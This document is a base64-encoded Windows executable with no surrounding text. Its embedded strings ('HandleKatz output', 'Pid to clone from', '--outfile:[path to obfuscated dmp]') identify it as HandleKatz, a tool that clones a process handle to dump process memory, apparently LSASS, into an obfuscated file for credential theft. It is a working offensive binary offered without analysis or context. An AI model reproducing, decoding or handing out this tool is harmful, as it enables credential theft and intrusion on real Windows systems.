aWRoTWllcEVpZkhvMVBELy8rbTUvZi8vRHgrQUFBQUFBRWk2WkNCdWIzUWdaVzVNaWVsSXVGc3RYU0JEYjNWc3g0UWs0QU1BQUd4bFoyVklpWlFreUFNQUFFaTZkV2NnY0hKcGRtbElpWVFrd0FNQUFFaTRZV0pzWlNCRVpXSklpWlFrMkFNQUFMb0tBQUFBWm9tVUpPUURBQUJJalpRa3dBTUFBRWlKaENUUUF3QUEvNVFraUFBQUFPazcvZi8va0VGVlJUSEpSVEhTU0xndUFHRUFZd0J0QUVGVVZWZElpYzh4eVZaSWlkWXgwbE5NaWNORk1jQklnZXlvQUFBQVNJbEVKQ1F4d0V5TlpDUWtTSTFzSkdCbWlVUWtMRWk0TGdCa0FHd0FiQUJJaVVRa0xraTRMZ0JrQUhJQWRnQklpVVFrT0VpNExnQmxBSGdBWlFCSWlVUWtRa2k0TGdCdkFHTUFlQUJJaVVRa1RFaTRMZ0IyQUhnQVpBQklpVVFrVmtpTlJDUXVTSWxFSkdoSWpVUWtPRWlKUkNSd1NJMUVKRUpJaVVRa2VFaU5SQ1JNU0ltRUpJQUFBQUJJalVRa1ZtYUpWQ1EyWm9sTUpFQm1SSWxFSkVwbVJJbE1KRlJtUklsVUpGNU1pV1FrWUVpSmhDU0lBQUFBU01lRUpKQUFBQUFBQUFBQVRJbmgvNVBJQUFBQVFZbkZTSmhJT2ZCelBVaUo4a2dwd2tpTkRGZE1pZUwva3lnQkFBQ0Z3SFVaU0lIRXFBQUFBRVNKNkZ0ZVgxMUJYRUZkdzJZUEgwUUFBRXlMWlFoSWc4VUlUWVhrZGJCRk1lM3IxWkNRa0pDUWtFRldRVlZCVkVtSjFGVkVpY1ZYUkluUFZraUp6bE5JZyt3Z1NJdFpXRWlMaENTQUFBQUFTSVhiZEcyTFVXQkVpMGxrUkRuS2NqWkhqU3dKVEl1d21BQUFBRVNKYVdUL2tJZ0FBQUJGaWVsSmlkZ3gwa2lKd1VuQjRRUkIvOVpJaWNOSWlVWllTSVhiZEZ1TFZtQkJpZENEd2dGSndlQUVUQUhEVElramlXc0lpWHNNaVZaZ1NJUEVJRnRlWDExQlhFRmRRVjdERHg4QVNJdVlnQUFBQU1kQlpDQUFBQUQva0lnQUFBQkJ1QUFDQUFBeDBraUp3Zi9UU0luRFNJbEdXRWlGMjNXbFNNZEdZQUFBQUFCSWc4UWdXMTVmWFVGY1FWMUJYc09Ra0pDUVZWZFdVMGhqYVR4SUFjMkx2WWdBQUFCSUFjOUVpMDhnaTNjWVNRSEpoZlowVm9uVFNZbkxSVEhTZ2ZORVEwSkJRWXNCdVFVVkFBQk1BZGhNalVBQkQ3WUFoTUIwSVdZdUR4K0VBQUFBQUFDSnlzSGlCUUhRQWNGTWljQkpnOEFCRDdZQWhNQjE2VG5aZEJSSmc4SUJTWVBCQkV3NTFuVzRNY0JiWGw5ZHc0dFhKRXVOREZPTFJ4d1B0eFFSU1kwVWs0c0VBa3dCMkVnNXgzZmVpNVdNQUFBQVNBSFhTRG40ZDlCYlNJbkJYbDlkNlJyMS8vK1FrSkNRa0pDUWtKQ1FRVlJCdVVBQUFBQkppY3hYVmt5SnhsTklpZE5JZyt4NFNNZEVKQ0FBQUFBQVRJMUVKRERvWmRqLy8waGpWQ1JzU1lud1RJbmhTTWRFSkNBQUFBQUFRYmtJQVFBQWljZElBZHJvUWRqLy8yYUJmQ1F3VFZwMUJBbkhkQlF4d0VpRHhIaGJYbDlCWE1NUEg0UUFBQUFBQURIQWdUNVFSUUFBRDVUQTYrR1FrSkJCVlVtSnpVaUowVUZVVTBpSjAwaUQ3RkRvMmZqLy8waUZ3SFEwU1luRVNZblpUWW5vTWRKSWljSG80ZWYvLzB5SjRVRzRBSUFBQURIUy8xTTRTSVBFVUxnQkFBQUFXMEZjUVYzRER4OUFBRWk0V3kxZElFWmhhV3pIUkNSQWJHVnpDa3lKNlVpNlpXUWdkRzhnWjJWSWlVUWtJRWk0ZENCaElHeHBjM1JJaVZRa0tFaTZJRzltSUdoaGJtUklpVlFrT0VpTlZDUWdTSWxFSkRER1JDUkVBUDlUQ0VpRHhGQXh3RnRCWEVGZHcxTzZ6OC9ZRkVpSnk3a3hyUUl4U0lQc0lPaHA5di8vdWlmby9aTzVNYTBDTVVpSkEraFg5di8vdWs3b2hwTzVNYTBDTVVpSlF3am9SUGIvLzdxSCs5cTV1WmZzVzVoSWlVTVE2REgyLy8rNnZvYlVxcmt4clFJeFNJbERHT2dlOXYvL3VrT0pNbm01TWEwQ01VaUpReURvQy9iLy83cTFoTVFJdVRHdEFqRklpVU1vNlBqMS8vKzZhb3pOSjdreHJRSXhTSWxETU9qbDlmLy91dE5NYm5tNU1hMENNVWlKUXpqbzB2WC8vN3B4ZmU5T3VXUFhUK1pJaVVOSTZMLzEvLys2ZkdIMFRybGoxMC9tU0lsRFVPaXM5Zi8vdWc0S0pLVzVNYTBDTVVpSlExam9tZlgvLzdvdHh4RmZ1VEd0QWpGSWlVTmc2SWIxLy8rNk1SL1pucmxqMTAvbVNJbERhT2h6OWYvL3V2U3ZmaWU1TWEwQ01VaUpRM0RvWVBYLy83cEtKTDlldVRHdEFqRklpVU40NkUzMS8vKzZSazRhaDdreHJRSXhTSW1EZ0FBQUFPZzM5Zi8vdW9IUUNuYTVNYTBDTVVpSmc0Z0FBQURvSWZYLy83cGhnbk5mdVRHdEFqRklpWU9RQUFBQTZBdjEvLys2dGlpdEVya3hyUUl4U0ltRG1BQUFBT2oxOVAvL3VyK3ovUjY1TWEwQ01VaUpnNkFBQUFEbzMvVC8vN3F5ckVyQ3VUR3RBakZJaVlPb0FBQUE2TW4wLy8rNmVJMnNjYmt4clFJeFNJbURzQUFBQU9pejlQLy91a29jQ0lPNU1hMENNVWlKZzdnQUFBRG9uZlQvLzdwazZJYVR1VEd0QWpGSWlZUEFBQUFBNklmMC8vKzZXL2h6anJreHJRSXhTSW1EeUFBQUFPaHg5UC8vdXR1bzBaYTVNYTBDTVVpSmc5QUFBQURvVy9ULy83cUxlamhNdVRHdEFqRklpWVBZQUFBQTZFWDAvLys2elFWQlVMbTdEczcxU0ltRDRBQUFBT2d2OVAvL3VpcTZOcFM1dXc3TzlVaUpnK2dBQUFEb0dmVC8vN29ZMnljNXVic096dlZJaVlQd0FBQUE2QVAwLy8rNnFhajlrN2t4clFJeFNJbUQrQUFBQU9qdDgvLy91aVFLSktXNU1hMENNVWlKZ3dBQkFBRG8xL1AvLzdyVzNKemt1VEd0QWpGSWlZTUlBUUFBNk1Iei8vKzZ0VVQxdDdreHJRSXhTSW1ERUFFQUFPaXI4Ly8vdXRxY3pidTVNYTBDTVVpSmd4Z0JBQURvbGZQLy83cXZudjJUdVRHdEFqRklpWU1nQVFBQTZIL3ovLys2UlozOWs3a3hyUUl4U0lsRFFPaHM4Ly8vdXNBdDdQcTVEY2xpSmtpSmd5Z0JBQURvVnZQLy8waUR1eEFCQUFBQVNJbURNQUVBQUErRUVRSUFBRWlEdXhnQkFBQUFENFFyQWdBQVNJTzdJQUVBQUFBUGhFVUNBQUJJZzN0Z0FBK0VZZ0lBQUVpRGUyZ0FENFIvQWdBQVNJTzdDQUVBQUFBUGhKa0NBQUJJZzNzSUFBK0V2Z0VBQUVpRGV4QUFENFN6QVFBQVNJTjdHQUFQaEtnQkFBQklnM3NnQUErRW5RRUFBRWlEZXlnQUQ0U1NBUUFBU0lON01BQVBoSWNCQUFCSWczczRBQStFZkFFQUFFaURlMGdBRDRSeEFRQUFTSU43VUFBUGhHWUJBQUJJZzN0WUFBK0VXd0VBQUVpRGUyQUFENFJRQVFBQVNJTjdhQUFQaEVVQkFBQklnM3R3QUErRU9nRUFBRWlEZTNnQUQ0UXZBUUFBU0lPN2dBQUFBQUFQaENFQkFBQklnN3VJQUFBQUFBK0VFd0VBQUVpRHU1QUFBQUFBRDRRRkFRQUFTSU83bUFBQUFBQVBoUGNBQUFCSWc3dWdBQUFBQUErRTZRQUFBRWlEdTZnQUFBQUFENFRiQUFBQVNJTzdzQUFBQUFBUGhNMEFBQUJJZzd1NEFBQUFBQStFdndBQUFFaUR1OEFBQUFBQUQ0U3hBQUFBU0lPN3lBQUFBQUFQaEtNQUFBQklnN3ZRQUFBQUFBK0VsUUFBQUVpRHU5Z0FBQUFBRDRTSEFBQUFTSU83NEFBQUFBQjBmVWlEdStnQUFBQUFkSE5JZzd2d0FBQUFBSFJwU0lPNytBQUFBQUIwWDBpRHV3QUJBQUFBZEZWSWc3c0lBUUFBQUhSTFNJTzdFQUVBQUFCMFFVaUR1eGdCQUFBQWREZElnN3NnQVFBQUFIUXRTSU43UUFCMEpraUR1eWdCQUFBQWRCeElnN3N3QVFBQUFIUVNNY0JJZ3pzQUQ1WEE2d2tQSDRBQUFBQUFNY0JJZzhRZ1c4TzYxdHljNUxtSUp2Z0E2Q0h4Ly85SWc3c1lBUUFBQUVpSmd4QUJBQUFQaGRuOS8vOFBIMEFBdXJWRTliZTVpQ2I0QU9qNThQLy9TSU83SUFFQUFBQklpWU1ZQVFBQUQ0Vy8vZi8vRHg5QUFMcmFuTTI3dVlnbStBRG8wZkQvLzBpRGUyQUFTSW1ESUFFQUFBK0ZwZjMvL3c4ZmdBQUFBQUM2RGdva3BibUlKdmdBNktudy8vOUlnM3RvQUVpSlEyQVBoWXY5Ly85bUxnOGZoQUFBQUFBQXVpM0hFVis1aUNiNEFPaUI4UC8vU0lPN0NBRUFBQUJJaVVOb0Q0VnUvZi8vRHgrQUFBQUFBTG9rQ2lTbHVZZ20rQURvV2ZELy8waUpnd2dCQUFEcFRQMy8vNUNRa0pDUWtKQ1FrSkNRa0pCQlZMb29BQUFBUlRIa1ZsTklpY3RJeDhILy8vLy9TSVBzY0VqSFJDUTRBQUFBQUV5TlJDUTRTTWRFSkVBQUFBQUFTTWRFSkVnQUFBQUE2RW5MLy8rRndIVldNY25IUkNSQUFRQUFBRWk2Y21sMmFXeGxaMlZJdUZObFJHVmlkV2RRU0lsVUpGaElqWFFrUUVpTlZDUlF4MFFrVEFJQUFBQk1qVVFrUkVpSlJDUlF4a1FrWUFEL2t6QUJBQUNGd0hVWFNJdE1KRGovVXloSWc4UndSSW5nVzE1QlhNTVBId0JJaTB3a09FRzVFQUFBQUVtSjhESFNTTWRFSkNnQUFBQUFTTWRFSkNBQUFBQUE2Q0hGLy85SWkwd2tPSVhBZFJqL1V5aEJ2QUVBQUFCSWc4UndSSW5nVzE1QlhNTVBId0QvVXloSWc4UndSSW5nVzE1QlhNT1F1QUVBQUFERGtKQ1FrSkNRa0pDUWtQLy8vLy8vLy8vL0FBQUFBQUFBQUFELy8vLy8vLy8vL3dBQUFBQUFBQUFBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABwf0AAAAAAAAAAAAAAAAAA//////////8AAAAAAAAAAP8AAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAA/////wAAAAAAAAAAAAAAAEAAAADDv///wD8AAAEAAAAAAAAADgAAAAAAAAAAAAAAwBFBAAAAAAAAAAAAAAAAAPB8QAAAAAAAAAAAAAAAAAAQfUAAAAAAACB9QAAAAAAAoH1AAAAAAAAwfUAAAAAAAAB+QAAAAAAAAAAAAAAAAAAQfkAAAAAAAAAAAAAAAAAAIH5AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAWypdIFJlY29uIG9ubHk6ICVkCgBbKl0gUGF0aCBkbXA6ICVzCgBbKl0gUGlkIHRvIGNsb25lIGZyb206ICVkCgAAAAAAAAAAWypdIEhhbmRsZUthdHogcmV0dXJuIHZhbHVlOiAlZAoAWypdIEhhbmRsZUthdHogb3V0cHV0OgoKACVzCgAtLXJlY29uAC0tcGlkAC0tb3V0ZmlsZQAAACVzIHstLXJlY29ufSB7LS1waWQ6W3BpZCB0byBjbG9uZSBmcm9tXSAtLW91dGZpbGU6W3BhdGggdG8gb2JmdXNjYXRlZCBkbXBdCgAAAAAAAAAAAAAAAAAAAAAAAAAAAOAZQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEBBAAAAAAAIQEEAAAAAAJwQQQAAAAAAQDBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFVua25vd24gZXJyb3IAAABBcmd1bWVudCBkb21haW4gZXJyb3IgKERPTUFJTikAAE92ZXJmbG93IHJhbmdlIGVycm9yIChPVkVSRkxPVykAUGFydGlhbCBsb3NzIG9mIHNpZ25pZmljYW5jZSAoUExPU1MpAAAAAFRvdGFsIGxvc3Mgb2Ygc2lnbmlmaWNhbmNlIChUTE9TUykAAAAAAABUaGUgcmVzdWx0IGlzIHRvbyBzbWFsbCB0byBiZSByZXByZXNlbnRlZCAoVU5ERVJGTE9XKQBBcmd1bWVudCBzaW5ndWxhcml0eSAoU0lHTikAAAAAAAAAX21hdGhlcnIoKTogJXMgaW4gJXMoJWcsICVnKSAgKHJldHZhbD0lZykKAADoOP//nDj//zQ4//+8OP//zDj//9w4//+sOP//TWluZ3ctdzY0IHJ1bnRpbWUgZmFpbHVyZToKAAAAAABBZGRyZXNzICVwIGhhcyBubyBpbWFnZS1zZWN0aW9uACAgVmlydHVhbFF1ZXJ5IGZhaWxlZCBmb3IgJWQgYnl0ZXMgYXQgYWRkcmVzcyAlcAAAAAAAAAAAICBWaXJ0dWFsUHJvdGVjdCBmYWlsZWQgd2l0aCBjb2RlIDB4JXgAACAgVW5rbm93biBwc2V1ZG8gcmVsb2NhdGlvbiBwcm90b2NvbCB2ZXJzaW9uICVkLgoAAAAAAAAAICBVbmtub3duIHBzZXVkbyByZWxvY2F0aW9uIGJpdCBzaXplICVkLgoAAAAAAAAAAAAAAAAAAACwPf//sD3//7A9//+wPf//sD3//xg9//+wPf//4D3//xg9//9DPf//AAAAAAAAAAAobnVsbCkATmFOAEluZgAAKABuAHUAbABsACkAAAAAALJo//+4Yv//uGL//8xo//+4Yv//1Gf//7hi///rZ///uGL//7hi//9gaP//nGj//7hi//9nZv//gGb//7hi//+cZv//uGL//7hi//+4Yv//uGL//7hi//+4Yv//uGL//7hi//+4Yv//uGL//7hi//+4Yv//uGL//7hi//+4Yv//uGL//7xm//+4Yv//9Gb//7hi//8sZ///ZGf//5xn//+4Yv//ImX//7hi//+4Yv//UGb//7hi//+4Yv//uGL//7hi//+4Yv//uGL//+lo//+4Yv//uGL//7hi//+4Yv//MGP//7hi//+4Yv//uGL//7hi//+4Yv//uGL//7hi//+4Yv//qmT//7hi//8nZP//oGP//0pl///gZf//GGb//4Jl//+gY///iGP//7hi//+iZf//wmX//2xk//8wY///4mT//7hi//+4Yv//+2P//4hj//8wY///uGL//7hi//8wY///uGL//4hj//8AAAAASW5maW5pdHkATmFOADAAAAAAAAAAAPg/YUNvY6eH0j+zyGCLKIrGP/t5n1ATRNM/BPp9nRYtlDwyWkdVE0TTPwAAAAAAAPA/AAAAAAAAJEAAAAAAAAAIQAAAAAAAABxA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cAABADAVAAAxFQAAdAABAEAVAAA/FwAAhAABAD8XAAB9GAAAkAABAH0YAACqGAAAnAABAMAYAAD6GAAAqAABAAAZAABqGQAAsAABAHAZAACPGQAAvAABAJAZAACXGQAAwAABAKAZAACjGQAAxAABALAZAADfGQAAyAABAOAZAABhGgAA0AABAHAaAABzGgAA3AABAIAaAAB4GwAA4AABAIAbAACDGwAA+AABAJAbAAD6GwAA/AABAAAcAABiHQAACAEBAHAdAAD+HwAAFAEBAAAgAABBIAAALAEBAFAgAABcIAAANAEBAGAgAAAaIgAAOAEBACAiAACLIgAAQAEBAJAiAAAIIwAAUAEBABAjAACZIwAAXAEBAKAjAACCJAAAZAEBAJAkAAC8JAAAbAEBAMAkAAAPJQAAcAEBABAlAACvJQAAdAEBALAlAAAoJgAAgAEBADAmAABpJgAAhAEBAHAmAADbJgAAiAEBAOAmAAAWJwAAjAEBACAnAACnJwAAkAEBALAnAABuKAAAlAEBALAoAAD3KAAAmAEBAAApAAATKgAApAEBACAqAAB3KgAArAEBAIAqAADYKwAAtAEBAOArAAAQLQAAyAEBABAtAABXLQAA1AEBAGAtAAANLgAA4AEBABAuAAAvMwAA6AEBADAzAADcNgAAAAIBAOA2AABAOAAAGAIBAEA4AADxOwAALAIBAAA8AADgPAAAPAIBAOA8AACQPQAASAIBAJA9AAB4PgAAVAIBAIA+AADwPwAAYAIBAPA/AAA7RQAAbAIBAEBFAADnTgAAgAIBAPBOAAAnTwAAmAIBADBPAACsTwAAoAIBALBPAADMTwAArAIBANBPAABGUQAAsAIBAFBRAAAQaAAAyAIBABBoAAAFaQAA5AIBABBpAABTaQAA9AIBAGBpAAA8agAA+AIBAEBqAACCagAABAMBAJBqAACCawAADAMBAJBrAAD0awAAGAMBAABsAACtbAAAIAMBALBsAABtbQAAMAMBAHBtAADJbgAAOAMBANBuAADQcAAAUAMBANBwAADecQAAZAMBAOBxAAAwcgAAeAMBADByAAD1cwAAfAMBAAB0AAAYdQAAjAMBACB1AAApdgAAlAMBADB2AABadgAAoAMBAGB2AACIdgAApAMBAJB2AAC3dgAAqAMBALB3AAAteQAArAMBADB5AACYeQAA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